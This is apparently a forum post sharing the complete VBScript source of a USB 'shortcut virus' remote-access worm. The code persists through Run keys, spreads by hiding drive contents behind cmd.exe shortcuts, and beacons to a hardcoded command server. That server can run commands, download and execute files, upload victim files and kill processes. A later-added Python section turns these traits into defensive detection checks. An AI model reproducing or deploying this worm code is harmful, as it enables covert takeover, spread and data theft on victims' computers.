Author  Topic: Shortcut virus (SOURCE CODE)  (Read 4,289 times)
**Aincrad**

Posts: 668

Shortcut virus (SOURCE CODE)
« on: 24 September 2017, 04:20 am »

Hello everyone, I bring you the shortcut virus (newphototaday), also known as drive.bat, since the virus generates a batch file with that name on USB drives.

The virus is a VBS. On pen drives it is found in WSF format because it is encrypted.

VBS virus:

Code:
'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "update-flash.servehttp.com"
port = 666
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
     param = cmd (1)
     execute param
case "update"
     param = cmd (1)
     oneonce.close
     set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
     oneonce.write param
     oneonce.close
     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
     wscript.quit
case "uninstall"
     uninstall
case "send"
     download cmd (1),cmd (2)
case "site-send"
     sitedownloader cmd (1),cmd (2)
case "recv"
     param = cmd (1)
     upload (param)
case  "enum-driver"
     post "is-enum-driver",enumdriver
case  "enum-faf"
     param = cmd (1)
     post "is-enum-faf",enumfaf (param)
case  "enum-process"
     post "is-enum-process",enumprocess
case  "cmd-shell"
     param = cmd (1)
     post "is-cmd-shell",cmdshell (param)
case  "delete"
     param = cmd (1)
     deletefaf (param)
case  "exit-process"
     param = cmd (1)
     exitprocess (param)
case  "sleep"
     param = cmd (1)
     sleep = eval (param)
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
   filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
   if  filesystemobj.fileexists (drive.path & "\" & installname)  then
       filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
   end if
   for each file in filesystemobj.getfolder( drive.path & "\" ).Files
       if not lnkfile then exit for
       if  instr (file.name,".") then
           if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
               file.attributes = 2+4
               if  ucase (file.name) <> ucase (installname) then
                   filename = split(file.name,".")
                   set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
                   lnkobj.windowstyle = 7
                   lnkobj.targetpath = "cmd.exe"
                   lnkobj.workingdirectory = ""
                   lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                   fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
                   if  instr (fileicon,",") = 0 then
                       lnkobj.iconlocation = file.path
                   else
                       lnkobj.iconlocation = fileicon
                   end if
                   lnkobj.save()
               end if
           end if
       end if
   next
   for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
       if not lnkfolder then exit for
       folder.attributes = 2+4
       foldername = folder.name
       set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
       lnkobj.windowstyle = 7
       lnkobj.targetpath = "cmd.exe"
       lnkobj.workingdirectory = ""
       lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
       foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
       if  instr (foldericon,",") = 0 then
           lnkobj.iconlocation = folder.path
       else
           lnkobj.iconlocation = foldericon
       end if
       lnkobj.save()
   next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
   for  each file in filesystemobj.getfolder ( drive.path & "\").files
        on error resume next
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 0
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                else
                    filesystemobj.deletefile (drive.path & "\" & file.name)
                end If
            else
                filesystemobj.deletefile (file.path)
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        folder.attributes = 0
    next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
   inf = hwid & spliter
   inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
   inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

   set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
   set os = root.execquery ("select * from win32_operatingsystem")
   for each osinfo in os
      inf = inf & osinfo.caption & spliter
      exit for
   next
   inf = inf & "plus" & spliter
   inf = inf & security & spliter
   inf = inf & usbspreading
   information = inf
else
   information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
   if  disk.volumeserialnumber <> "" then
       hwid = disk.volumeserialnumber
       exit for
   end if
next
end function


function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
   versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
   security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
  if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
     usbspreading = "true - " & date
     shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  else
     usbspreading = "false - " & date
     shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

  end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
   shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
   wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
   objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
  dim  objstreamdownload
  set  objstreamdownload = createobject("adodb.stream")
  with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
  end with
  set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
  shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub

sub download (fileurl,filedir)

if filedir = "" then
  filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
   objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
   dim  objstreamdownload
set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
   set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
  shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade
    .type = 1
    .open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
    enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
    enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
    enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
   enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
  readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
  readallfromany = oexec.stderr.readall
else
  readallfromany = ""
end if

cmdshell = readallfromany
end function

Please comment.
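As an added example for defenders (not part of the forum post or of the VBS above), the script below turns three behaviours that are visible in that source into triage checks a responder can run over artefacts already in hand: the HTTP beacon the main loop POSTs to `host:port/<command>` with the `information()` string in the User-Agent, the `wscript.exe //B "<installdir>\<script>"` value that `upstart()` writes into the Run keys, and the `cmd.exe` shortcuts with `/c start <script>&start [explorer ]<name>&exit` arguments that `install()` plants on removable drives. The endpoint names, field order and `<|>` separator come from the script; the sample request, hostnames, user names and paths are constructed for the example, and the parser tolerates an extra colon in the User-Agent header name because the script passes `"user-agent:"` as the header name and the exact wire form depends on the HTTP stack.

```python
"""Triage checks for the Houdini / "drive.bat" shortcut worm (added example).

Every sample input below is constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Optional

SPLITTER = "<|>"  # the script's field separator: "<" & "|" & ">"

# Command endpoints the script POSTs to (all taken from the VBS source).
BEACON_PATHS = {
    "is-ready", "is-enum-driver", "is-enum-faf", "is-enum-process",
    "is-cmd-shell", "is-sending", "is-recving",
}

# Order in which the VBS "information" function concatenates the fields.
INFO_FIELDS = ("hwid", "computername", "username", "os", "tag", "security", "usbspreading")


@dataclass
class Beacon:
    endpoint: str
    hwid: str
    computername: str
    username: str
    os: str
    security: str
    usbspreading: str


def parse_beacon(raw: str) -> Optional[Beacon]:
    """Return a Beacon when `raw` is one of the worm's HTTP requests, else None."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    req = re.match(r"^POST\s+/(.*?)\s+HTTP/1\.[01]\s*$", lines[0], re.I)
    if not req:
        return None
    # "/is-sending<|>C:\file" -> the command is the part before the splitter
    endpoint = req.group(1).split(SPLITTER, 1)[0].lower()
    if endpoint not in BEACON_PATHS:
        return None
    user_agent = None
    for line in lines[1:]:
        # "User-Agent: x" or "user-agent:: x" (script passes "user-agent:" as the name)
        hdr = re.match(r"^user-agent::?\s*(.*)$", line, re.I)
        if hdr:
            user_agent = hdr.group(1).strip()
            break
    if user_agent is None:
        return None
    fields = user_agent.split(SPLITTER)
    # The fixed literal "plus" in slot 5 is the cheapest fingerprint of this family.
    if len(fields) != len(INFO_FIELDS) or fields[4] != "plus":
        return None
    info = dict(zip(INFO_FIELDS, fields))
    return Beacon(endpoint=endpoint, hwid=info["hwid"], computername=info["computername"],
                  username=info["username"], os=info["os"], security=info["security"],
                  usbspreading=info["usbspreading"])


# upstart() writes  wscript.exe //B "<installdir>\<scriptname>"  into both Run keys.
RUN_VALUE_RE = re.compile(r'^\s*"?wscript(?:\.exe)?"?\s+//b\s+"?(.+?)"?\s*$', re.I)


def run_value_reason(data: str) -> Optional[str]:
    """Explain why a Run-key value matches the worm's persistence, or None."""
    m = RUN_VALUE_RE.match(data)
    if not m:
        return None
    target = m.group(1).lower()
    if "\\temp\\" in target:  # installdir defaults to %temp%
        return f"wscript //B autorun of a script under a Temp folder: {target}"
    return f"wscript //B (hidden window) autorun of {target}"


# install() builds shortcuts targeting cmd.exe with arguments
# "/c start <script>&start [explorer ]<original name>&exit"; spaces in names
# are wrapped as  name" "with" "spaces, which the lazy .+? absorbs.
LNK_ARGS_RE = re.compile(r'^/c start (?P<dropper>.+?)&start (?:explorer )?(?P<decoy>.+?)&exit$', re.I)


def lnk_decoy_fields(target_path: str, arguments: str) -> Optional[dict]:
    """Return {dropper, decoy} when a .lnk looks like one of the planted decoys."""
    if not target_path.strip().lower().endswith("cmd.exe"):
        return None
    m = LNK_ARGS_RE.match(arguments.strip())
    return m.groupdict() if m else None


# Constructed sample beacon (host and port are the ones in the script's config).
SAMPLE_REQUEST = (
    "POST /is-ready HTTP/1.1\r\n"
    "Host: update-flash.servehttp.com:666\r\n"
    "User-Agent: 1A2B3C4D<|>DESKTOP-TEST<|>alice<|>Microsoft Windows 10 Pro"
    "<|>plus<|>Windows Defender .<|>false - 24/09/2017\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print(parse_beacon(SAMPLE_REQUEST))
    print(run_value_reason('wscript.exe //B "C:\\Users\\alice\\AppData\\Local\\Temp\\newphototaday.vbs"'))
    print(lnk_decoy_fields("cmd.exe", '/c start newphototaday.vbs&start explorer holiday" "photos&exit'))
```

The beacon check is the one that survives renaming: the dropper's file name, install directory and C2 host all change between samples, but the seven-field User-Agent with the literal `plus` in the fifth slot and the `is-*` endpoint names are part of the protocol itself. The Run-key and shortcut checks are meant for host triage, where the values can be read with the usual registry and .lnk tooling and then passed to these functions as strings.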


